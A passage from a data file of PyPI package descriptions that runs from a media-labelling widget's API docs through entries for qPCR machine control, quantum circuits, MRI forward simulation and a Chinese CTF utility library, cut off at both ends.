B\",\"freeform\":True},]},items=[{\"target\":{\"plots\":[{\"x\":{\"name\":\"time\",\"values\":x},\"y\":{\"lines\":[{\"name\":\"value\",\"values\":np.sin(x),\"color\":\"green\",\"dot\":{\"labelKey\":\"Peaks\"},}]},\"areas\":[{\"x1\":0,\"x2\":np.pi,\"label\":\"a\",\"labelKey\":\"A or B\",\"labelVal\":\"a\",},{\"x1\":np.pi,\"x2\":2*np.pi,\"label\":\"b\",\"labelKey\":\"A or B\",\"labelVal\":\"b\",},],}],},\"type\":\"time-series\",}],)qsl.MediaLabeler(**params)Stacked Imageparams=dict(items=[{\"type\":\"image-stack\",\"target\":{\"images\":[{\"name\":image[\"name\"],\"target\":image[\"filepath\"],\"transform\":cv2.getRotationMatrix2D(center=(0,0),angle=image[\"angle\"],scale=1),}forimageinqsl.testing.files.ROTATED_TEST_IMAGES]},}],config={\"image\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Cat\"},{\"name\":\"Dog\"}],},{\"name\":\"Location\",\"multiple\":False,\"options\":[{\"name\":\"Indoor\"},{\"name\":\"Outdoor\"}],},{\"name\":\"Flags\",\"multiple\":True,\"freeform\":True},],\"regions\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Eye\"},{\"name\":\"Nose\"}],}],},)qsl.MediaLabeler(**params)APIJupyter Widgetqsl.MediaLabeleraccepts the following arguments:config[required]: The configuration to use for labeling. It has the following properties.image[required]: The labeling configuration at the image-level for images, the frame-level for vidos, and the time-series level of time series targets. It is a list of objects, each of which have the following properties:name[required]: The name for the label entry.displayName: The displayed name for the label entry in the UI. Defaults to the same value asname.multiple: Whether the user can supply multiple labels for this label entry. Defaults tofalse.freeform: Whether the user can write in their own labels for this entry. Defaults tofalse.required: Whether the user is required to provide a label for this entry.options: A list of options that the user can select from -- each option has the following properties.name[required]: The name for the option.displayName: The displayed name for the option. Defaults to the same value asname.shortcut: A single-character that will be used as a keyboard shortcut for this option. If not set,qslwill try to generate one on-the-fly.regions[required]: The labeling configuration at the region-level for images and video frames. It has no effect oftime-seriestargets. It is a list of objects with the same structure as that of theimagekey.items[required]: A list of items to label, each of which have the following properties.jsonpath: The location in which to save labels. If neither this property nor the top-leveljsonpathparameters are set, you must get the labels fromlabeler.items.type[optional, default=image]: The type of the labeling target. The options areimage,video, andtime-series.metadata: Arbitrary metadata about the target that will be shown alongside the media and in the media index. Provided as an object of string keys and values (non-string values are not supported).target[optional]: The content to actually label. The permitted types depend on thetypeof the target.Iftypeisvideo,targetcan be:A string filepath to a video.A string URL to a video (e.g.,https://example.com/my-video.mp4)A string URL to an S3 resource (e.g.,s3://my-bucket/my-video.mp4)A string representing a base64-encoded file (e.g.,data:image/png;charset=utf-8;base64,...)Iftypeisimage,targetcan be any of the image types (filepath, URL, base64-encoded file). In addition it can also be:Anumpyarray with shape(height, width, 3). The final axis should be color in BGR order (i.e., OpenCV order).Iftypeistime-series, the only permitted type is an object with the following keys:plots[required]: A list of objects representing plots, each of which has the following properties:x[required]: An object with properties:name[required]: The name used for the x-axis.values[required]: An array of numerical values.y[required]: An object with properties:lines[required]: An array of objects, each with properties:name[required]: The name for this line, used for drawing a legend.values[required]: An array of numerical values for this line. It must be the same length asx.values.color[optional]: A string representing a color for the line. Defaults toblue.dot[optional]: An object with the following properties, used to configure what happens when a user clicks on a data point.labelKey[required]: The image-level label to which clicked values should be applied. If a user clicks a data point, the x-coordinate for the clicked dot will be set as the label inlabelKey. If that label has\"multiple\": True, then it is appended to a list of values. If it is\"multiple\": False, then the clicked dot x-coordinate will replace the value inlabelKey.areas[optional]: A list of clickable areas to draw onto the plot, each of which should have the following properties:x1[required]: The starting x-coordinate for the area.x2[required]: The ending x-coordinate for the area.labelKey[required]: The label entry to which this area will write when the user clicks on it.labelVal[required]: The value to which the label entry will be assigned when the user clicks on it.label[required]: The text label that will appear on the area.labels: Labels for the target. When the user labels the item in the interface, this property will be modified.For images, it has the following properties:image: Image-level labels for the image of the form{[name]: [...labels]}wherenamecorresponds to thenameof the corresponding entry in theconfig.imagearray.polygons: Polygon labels for the image of the form:points[required]: A list of{x: float, y: float}values.xandyrepresent percentage of width and height, respectively.labels: An object of the same form as theimagekey above.boxes: Rectilinear bounding box labels for the image of the form:pt1[required]: The top-left point as an{x: float, y: float}object.pt2[required]: The bottom-right point. Same format aspt1.labels: An object of the same form as theimagekey above.masks: Segmentation masks of the form:dimensions[required]: The dimensions of the segmentation mask as awidth: int, height: intobject.counts[required]: A COCO-style run-length-encoded mask.For videos, it is an array of objects representing frame labels. Each object has the form:timestamp[required]: The timestamp in the video for the labeled frame.end: The end timstamp, for cases where the user is labeling a range of frames. They can do this by alt-clicking on the playbar to select an end frame.labels: Same as the imagelabelsproperty, but for the timestamped frame (i.e., an object withimage,polygons,boxes, andmasks).defaults: The default labels that will appear with given item. Useful for cases where you want to present a default case to the user that they can simply accept and move on. Has the same structure asdefaults.allowConfigChange: Whether allow the user to change the labeling configuration from within the interface. Defaults to true.maxCanvasSize: The maximum size for drawing segmentation maps. Defaults to 512. Images larger than this size will be downsampled for segmentation map purposes.maxViewHeight: The maximum view size for the UI. Defaults to 512. You will be able to pan/zoom around larger images.mode: The style in which to present the UI. Choose between \"light\" or \"dark\". Defaults to \"light\".batchSize: For images, the maximum number of images to show for labeling simultaneously. Any value greater than 1 is incompatible with any configuration that includesregions. Videos and time series will still be labeled one at a time.jsonpath: The location in which to save labels and configuration for this labeler. If neither this property nor the top-leveljsonpathparameters are set, you must get the labels fromlabeler.items. Note that if the file at this path conflicts with any of the settings provided as arguments, the settings in the file will be used instead.Command Line ApplicationYou can launch the same labeling interface from the command line usingqsl label <...files>. If the project file does not exist, it will be created. The files you provide will be added. If the project file already exists, files that aren't already on the list will be added. You can edit the project file to modify the settings that cannot be changed from within the UI (i.e.,allowConfigChange,maxCanvasSize,maxViewHeight,mode, andbatchSize).DevelopmentCreate a local development environment usingmake initRun widget development with live re-building usingmake developRun a Jupyter Lab instance usingmake lab. Changes to the JavaScript/TypeScript require a full refresh to take effect."} +{"package": "qslib", "pacakge-description": "Our DNA 28 poster is available here.Documentation:Stable,LatestqslibQSLib is a package for interacting with Applied Biosystems' QuantStudio\nqPCR machines, primarily intended for non-qPCR uses, such as DNA computing and\nmolecular programming systems. It allows the creation, processing, and\nhandling of experiments and experiment data, and interaction with\nmachines through their network connection and SCPI interface.The package was originally written for 96-well-block QuantStudio 5 machines.\nHowever, it has some support for other machines, particularly for reading\nEDS files: it supports v1.3 and (partially) v2.0 specification EDS files,\nand should be able to read at least some data from files generated by\nViia7, QuantStudio 3, QuantStudio 5, QuantStudio 6 Flex, and QuantStudio 6 Pro\nmachines, with 96-well and 384-well blocks. If you have problems reading EDS files,\nor have found that it works with other machines, please let me know.Amongst other features that it has:Direct fluorescence data (\"filter data\") as Pandas dataframes, with\ntimes and temperature readings.Running-experiment data access, status information, and control.Protocol creation and manipulation, allowing functions outside of\nAB's software. Protocols can be modified and updated mid-run.Temperature data at one-second resolution during experiments.Machine control functions: immediate pauses and resumes, drawer\ncontrol, power, etc.With qslib-monitor: live monitoring of machine state information,\nwith Matrix notifications, InfluxDB storage, and Grafana dashboards.Installation and SetupQSLib is pure Python, and can be installed via pip:pip3 install -U qslibOr, for the current Github version:pip3 install -U --pre git+https://github.com/cgevans/qslibIt requires at least version 3.9 of Python. While it uses async code at\nits core for communication, it can be used conveniently in Jupyter or\nIPython.To use the library for communication with machines, you'll need a\nmachine access password with Observer (for reading data and statuses)\nand/or Controller (for running experiments and controlling the machine)\naccess. You will also need access to the machine on port 7443 (machine\nsoftware versions 1.3.4 and higher), or port 7000 (earlier software versions).In machine software versions 1.3.4 and higher, you can set a password using\nthe \"OEM Connection Only\" option in \"Settings\". Earlier software versions\nmust have passwords set by other methods. Regardless of version, I strongly\nrecommend against having the machines be accessible online: use a restricted VPN\nconnection or port forwarding. See the documentation for more information.Contributing and issue reportingIssue reports and enhancement requests can be submitted via Github.Potential contributions can be submitted via Github. These should include pytest tests, preferably\nboth tests that can be run without outside resources, and, if applicable, tests that directly test\nany communication with a QuantStudio SCPI server. They will also need a Contributor Licence Agreement.Private vulnerability reports can be sent to me by\nemail, PGP-encrypted, or via Matrix to@cge:matrix.org.DisclaimerThis package was developed for my own use. It may break your machine or\nvoid your warranty. Data may have errors or be incorrect. When used to\nsend raw commands at high access levels, the machine interface could\nrender your machine unusable or be used to send commands that would\nphysically/electrically damage the machine or potentially be hazardous\nto you or others.I am not any way connected with Applied Biosystems. I have developed this\npackage using the machine's documentation system and standard file formats."} +{"package": "qsm", "pacakge-description": "qsmModule Python pour la manipulation de circuits quantiques.InstallationpipinstallqsmExample d Utilisation:fromqsmimportQuantumCircuit# Cr\u00e9er un circuit quantique avec 3 qubitscircuit=QuantumCircuit(3)# Appliquer une porte Hadamard sur le premier qubitcircuit.h(0)# Appliquer une porte CNOT entre le premier et le deuxi\u00e8me qubitcircuit.cx(0,1)# Mesurer l'\u00e9tat du circuitresultats=circuit.measure_all(shots=1024)print(resultats)Licencece projet est sous licence particulier, juste un message au proprietaire du module pour son accord pour la copie, etc..Contributionce projet peut etre contribu\u00e9 par differente mani\u00e9re:\nreddit laisser un message pour contribu\u00e9 dans r/pythongithub cr\u00e9er un repertoire pour ajouter des fonctionnalit\u00e9 si necc\u00e9ssaire"} +{"package": "qsmap", "pacakge-description": "No description available on PyPI."} +{"package": "qsmcli", "pacakge-description": "qsmcliQ system management command line toolInstallationYou will need to install python3 first, qsmcli has\n# pip3 install qsmclirunning qsmclipython3 -m qsmclisupported shell mode and commandCommand line modeWhen invoke this command, if there is any argument, then the command executed.Shell modeIn Shell mode, if there is no argument is specified, then the shell mode is entered.\nThe host and username/password is saved in the prompt.Command supportedhelp/?Any command with help command involved will print the help message.ipmiThis is the command to redirect all of the command to ipmitoolmacget system mac command and print out the system mac we have\nmac [index], index range from 0 to 5\nfor example: mac 0cpldget CPLD information:\ncpld [fw|cksum|id]\nfw: get CPLD fw\ncksum: get CPLD checksum\nid: Get CPLD idcodemeQuery ME related information.\nme [version|cpu|dimm|io]\nme version: to get ME version\nme cpu: to get CPU utililization\nme dimm: to get DIMM utililization\nme io: to get IO utilizationnicget, set the BMC dedicate/share NIC\nnic [dedicate|lom-share|mezz-share0|mizz-share1]Return: \nFor LAN Card Type,\n0h- BMC Dedicated\n2h- Shared NIC (OCP Mezzanine slot)\n3h- Shared NIC (QCT Mezzanine slot)serviceeanble/disable Service commands:\nservice [enable/disable] [web|kvm|cd-media|hd-media|ssh|solssh]\nPlease notice this utility will get the service configuration data and\nset the configuration data when set it. It do not guarantee that BMC has this feature.TestTo run the unit test command, use 'python3 -m unittest'\nUpload to github will trigger Travis CI run the unittestDistribute the packageTo generate the package, use 'package.sh' to build the package."} +{"package": "qsm-forward", "pacakge-description": "QSM Forward ModelBased on Marques, J. P., et al. (2021). QSM reconstruction challenge 2.0: A realistic in silico head phantom for MRI data simulation and evaluation of susceptibility mapping procedures. Magnetic Resonance in Medicine, 86(1), 526-542.https://doi.org/10.1002/mrm.28716Includes code for:Field model (forward multiplication with dipole kernel based on chi)Signal model (magnitude and phase simulation based on field/M0/R1/R2star)Phase offset modelNoise modelShim field modelk-space croppingInstallpip install qsm-forwardExample using simulated sourcesIn this example, we simulated susceptibility sources (spheres and rectangles) to generate a BIDS directory:importqsm_forwardif__name__==\"__main__\":recon_params=qsm_forward.ReconParams()recon_params.subject=\"simulated-sources\"recon_params.peak_snr=100tissue_params=qsm_forward.TissueParams(chi=qsm_forward.generate_susceptibility_phantom(resolution=[100,100,100],background=0,large_cylinder_val=0.005,small_cylinder_radii=[4,4,4,7],small_cylinder_vals=[0.05,0.1,0.2,0.5]))qsm_forward.generate_bids(tissue_params,recon_params,\"bids\")bids/\n\u2514\u2500\u2500 sub-simulated-sources\n \u2514\u2500\u2500 ses-1\n \u251c\u2500\u2500 anat\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-1_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-1_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-1_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-1_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-2_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-2_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-2_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-2_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-3_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-3_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-3_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-3_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-4_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-4_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-4_part-phase_MEGRE.json\n \u2502 \u2514\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-4_part-phase_MEGRE.nii\n \u2514\u2500\u2500 extra_data\n \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_chi.nii\n \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_mask.nii\n \u2514\u2500\u2500 sub-simulated-sources_ses-1_run-1_segmentation.niiSome repesentative images including the mask, first and last-echo phase image, and ground truth susceptibility (chi):Example using head phantom dataIn this example, we generate a BIDS-compliant dataset based on therealistic in-silico head phantom. If you have access to the head phantom, you need to retain thedatadirectory which provides relevant tissue parameters:importqsm_forwardimportnumpyasnpif__name__==\"__main__\":tissue_params=qsm_forward.TissueParams(root_dir=\"~/data\")recon_params_all=[qsm_forward.ReconParams(voxel_size=voxel_size,peak_snr=100,session=session)for(voxel_size,session)in[(np.array([0.8,0.8,0.8]),\"0p8\"),(np.array([1.0,1.0,1.0]),\"1p0\"),(np.array([1.2,1.2,1.2]),\"1p2\")]]forrecon_paramsinrecon_params_all:qsm_forward.generate_bids(tissue_params=tissue_params,recon_params=recon_params,bids_dir=\"bids\")bids/\n\u2514\u2500\u2500 sub-1\n \u251c\u2500\u2500 ses-0p8\n \u2502 \u251c\u2500\u2500 anat\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-1_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-1_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-1_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-1_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-2_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-2_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-2_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-2_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-3_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-3_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-3_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-3_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-4_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-4_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-4_part-phase_MEGRE.json\n \u2502 \u2502 \u2514\u2500\u2500 sub-1_ses-0p8_run-1_echo-4_part-phase_MEGRE.nii\n \u2502 \u2514\u2500\u2500 extra_data\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_chi.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_mask.nii\n \u2502 \u2514\u2500\u2500 sub-1_ses-0p8_run-1_segmentation.nii\n \u251c\u2500\u2500 ses-1p0\n \u2502 \u251c\u2500\u2500 anat\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-1_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-1_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-1_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-1_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-2_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-2_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-2_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-2_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-3_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-3_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-3_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-3_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-4_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-4_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-4_part-phase_MEGRE.json\n \u2502 \u2502 \u2514\u2500\u2500 sub-1_ses-1p0_run-1_echo-4_part-phase_MEGRE.nii\n \u2502 \u2514\u2500\u2500 extra_data\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_chi.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_mask.nii\n \u2502 \u2514\u2500\u2500 sub-1_ses-1p0_run-1_segmentation.nii\n \u2514\u2500\u2500 ses-1p2\n \u251c\u2500\u2500 anat\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-1_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-1_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-1_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-1_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-2_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-2_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-2_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-2_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-3_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-3_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-3_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-3_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-4_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-4_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-4_part-phase_MEGRE.json\n \u2502 \u2514\u2500\u2500 sub-1_ses-1p2_run-1_echo-4_part-phase_MEGRE.nii\n \u2514\u2500\u2500 extra_data\n \u251c\u2500\u2500 sub-1_ses-1p2_run-1_chi.nii\n \u251c\u2500\u2500 sub-1_ses-1p2_run-1_mask.nii\n \u2514\u2500\u2500 sub-1_ses-1p2_run-1_segmentation.niiSome repesentative images including the ground truth chi map, first-echo magnitude image, and first and last-echo phase images:Example including T1-weighted imagesimportqsm_forwardimportnumpyasnpif__name__==\"__main__\":tissue_params=qsm_forward.TissueParams(root_dir=\"~/data\",chi=\"ChiModelMIX.nii.gz\")recon_params_all=[qsm_forward.ReconParams(voxel_size=voxel_size,session=session,TEs=TEs,TR=TR,flip_angle=flip_angle,suffix=suffix,save_phase=save_phase)for(voxel_size,session,TEs,TR,flip_angle,suffix,save_phase)in[(np.array([0.64,0.64,0.64]),\"0p64\",np.array([3.5e-3]),7.5e-3,40,\"T1w\",False),(np.array([0.64,0.64,0.64]),\"0p64\",np.array([0.004,0.012,0.02,0.028]),0.05,15,\"T2starw\",True),]]forrecon_paramsinrecon_params_all:qsm_forward.generate_bids(tissue_params=tissue_params,recon_params=recon_params,bids_dir=\"bids\")bids/\n\u2514\u2500\u2500 sub-1\n \u2514\u2500\u2500 ses-0p64\n \u251c\u2500\u2500 anat\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-1_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-1_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-1_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-1_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-2_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-2_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-2_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-2_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-3_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-3_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-3_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-3_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-4_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-4_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-4_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-4_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_T1w.json\n \u2502 \u2514\u2500\u2500 sub-1_ses-0p64_run-1_T1w.nii\n \u2514\u2500\u2500 extra_data\n \u251c\u2500\u2500 sub-1_ses-0p64_run-1_chi.nii\n \u251c\u2500\u2500 sub-1_ses-0p64_run-1_mask.nii\n \u2514\u2500\u2500 sub-1_ses-0p64_run-1_segmentation.niiSome repesentative images including the T2starw and T1w magnitude images:Example simulating oblique acquisitionIn thisexample, we simulated spherical susceptibility sources to generate a BIDS directory with a range of B0 directions:On the left is the phase image with the two sources with an axial B0 direction. On the right is a phase image with the two sources with a B0 direction rotated 30 degrees about the x axis."} +{"package": "qsml", "pacakge-description": "qsmlqsml is a markup language for key value securities (stock name, amount)quick securities markup language is a project geared towards listing portfolios for performing data analysis uponInstallationgit clone https://github.com/michaelpeterswa/qsml.git\n\nor\n\npip3 install qsmlOr download the file manually.Release History1.0.0Opened Repository (06.25.2020)MetaMichael Peters -enter additional contact information hereDistributed under the MIT license. SeeLICENSEfor more information."} +{"package": "qs-mps", "pacakge-description": "qs-mpsqs-mps is a Python package that enables researchers to simulate Quantum Systems with Matrix Product State tensors.InstallationYou can install qs-mps either by cloning the repository or using pip.pipinstallqs-mpsClone the RepositoryTo clone the repository locally, use the following command:gitclonegit@github.com:Fradm98/qs-mps.git"} +{"package": "qSMTP", "pacakge-description": "No description available on PyPI."} +{"package": "qsmxt", "pacakge-description": "QSMxT is an end-to-end software toolbox for Quantitative Susceptibility Mapping"} +{"package": "qsnark-python-sdk", "pacakge-description": "Document seehttps://github.com/hyperchaincn/qsnark-python-sdk"} +{"package": "qsnctf", "pacakge-description": "\ud83e\udd14What is QSNCTF\uff1f\u9752\u5c11\u5e74CTF\u8bad\u7ec3\u5e73\u53f0\u662f\u4e00\u4e2a\u516c\u76ca\u3001\u514d\u8d39\u3001\u4f9b\u7ed9\u5168\u56fd\u9752\u5c11\u5e74\u5b66\u4e60\u3001\u8bad\u7ec3\u7684CTF\u5728\u7ebf\u5e73\u53f0\u3002\uff08\u672c\u4ed3\u5e93\uff09qsnctf\u662f\u9752\u5c11\u5e74CTF\u8bad\u7ec3\u5e73\u53f0\u8fdb\u884c\u7f16\u5199\u7684\u4e00\u4e2aPython\u5305\u7a0b\u5e8f\uff0c\u610f\u56fe\u5728Python\u4e2d\u4e3a\u5927\u5bb6\u5feb\u901f\u4f7f\u7528\u4e00\u4e9bCTF\u5e38\u7528\u529f\u80fd\u5f00\u53d1\u7684\u5f00\u6e90\u5305\u3002\u8fd9\u91cc\u6709\u5f88\u591aCTF\u5e38\u7528\u529f\u80fd\uff0c\u5982Base\u7f16\u7801\u3001hash\u52a0\u5bc6\uff0c\u751a\u81f3\u5c11\u89c1\u7684\u793e\u4f1a\u4e3b\u4e49\u6838\u5fc3\u4ef7\u503c\u89c2\u7f16\u7801\u3001quipqiup\u7b49\u90fd\u5728\u5176\u4e2d\u3002\u6ce8\u610f\uff1a2023\u5e7401\u670809\u65e5\u53d1\u5e03\u7684Ver:0.0.8.7\u5df2\u7ecf\u652f\u6301\u4e86\u538b\u7f29\u5305\u5bc6\u7801\u7834\u89e3\u548c\u4e0b\u9762\u7684\u6240\u6709\u529f\u80fd\uff0cFunction\u7684\u6587\u6863\u51c6\u5907\u8fc1\u79fb\u81f3\uff1ahttps://docs.qsnctf.com/\u9996\u6b21\u53d1\u5e03\u65f6\u95f4\u9884\u8ba1\u4e8e2022\u5e7401\u670810\u65e5\uff0c\u656c\u8bf7\u671f\u5f85\u3002\u5982\u679c\u60a8\u6709\u597d\u7684\u60f3\u6cd5\u548c\u5efa\u8bae\uff0c\u6b22\u8fce\u4e0e\u6211\u53d6\u5f97\u8054\u7cfb\uff1aQQ\uff1a1044631097\u3002\u6587\u6863\u5176\u4ed6\u8bed\u79cd\uff1aEnglish\u51fd\u6570\u5e93\uff1a\u4f7f\u7528\u8bf4\u660e\u5b89\u88c5\u9996\u5148\u5c06GitHub\u4e0a\u7684\u9879\u76ee\u4e0b\u8f7d\u4e0b\u6765\u540e\u53ef\u4ee5\u6587\u4ef6\u4e2d\u6709\u4e00\u4e2asetup.py\u6253\u5f00\u7ec8\u7aef\u7136\u540e\u8f93\u5165pythonsetup.pyinstall\u6216\u8005\u4e5f\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528pip\u6765\u8fdb\u884c\u5b89\u88c5**\uff08\u7531\u4e8e\u672cPython\u5e93\u4ecd\u5728\u5f00\u53d1\uff0c\u6240\u4ee5pip\u53ef\u80fd\u4e0d\u662f\u6700\u65b0\u7248\uff0c\u5982\u679c\u60a8\u6709\u8f83\u9ad8\u7684\u9700\u6c42\uff0c\u53ef\u4ee5\u76f4\u63a5clone\u672c\u4ed3\u5e93\u8fdb\u884c\u5b89\u88c5\uff09**pipinstallqsnctf\u5b89\u88c5\u6210\u529f\u4f1a\u663e\u793aSuccessfully installed PyExecJS-1.5.1 